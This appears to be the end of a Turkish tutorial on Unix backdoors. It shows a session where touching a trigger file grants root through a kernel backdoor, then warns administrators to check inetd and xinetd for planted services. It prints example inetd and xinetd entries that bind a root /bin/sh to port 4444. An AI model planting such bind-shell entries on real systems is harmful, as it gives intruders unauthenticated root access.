eregli@eregli eregli]# ssh -l avicenna arkakapili.sistem
avicenna@arkakapili's password:
Last login: Mon Apr 14 02:31 2003 from eregli.sistem
[avicenna@arkakapili avicenna]$ <-- Normal kullanici durumumda
[avicenna@arkakapili avicenna]$ touch op_beni <-- Sihirli kelimeler fisildandi
[avicenna@arkakapili avicenna]$ exit <-- Sistemden ayrildi.
-- Kernel Backdoor sisteme tekrar baglanmasini
-- beklemektedir. Cünkü üstadına yöneticilik
-- sertifikasi verecektir

[eregli@eregli eregli]$ ssh -l avicenna arkakapili.sistem
avicenna@arkakapili's password:
Last login: Mon Apr 14 05:30:34 2003 from eregli.sistem
[avicenna@arkakapili avicenna]# <-- Sonuç

Sistemdeki servislerin her zaman uslu uslu duracak halleri olmayabilir.
Sizden habersiz birileri sisteme servisler ekleme ihtimallerine karşın /etc/inetd.conf
dosyasını ve /etc/xinetd.d dizini altında bulunan dosyaları kontrol etmek menfaat icabıdır.

[root@arkakapili /]cat /etc/inetd.conf
...
echo 4444 stream tcp nowait root /bin/sh sh -i <-- Dikkat !!!!
...

[root@sistem /xserver]cat /etc/xinetd.d/kendim <--
...
protocol = tcp |
port = 4444 |
socket_type = stream |
wait = no |
user = root |
server = /bin/sh |--- Dikkat !!!!
server_args = -i |
...

Arka kapı durumlarına kısaca değinmeye çalıştım. Umarım bazı konuların aydınlanmasında
azda olsa ışık vermişimdir.

Paylaşım İçin Teşekkürler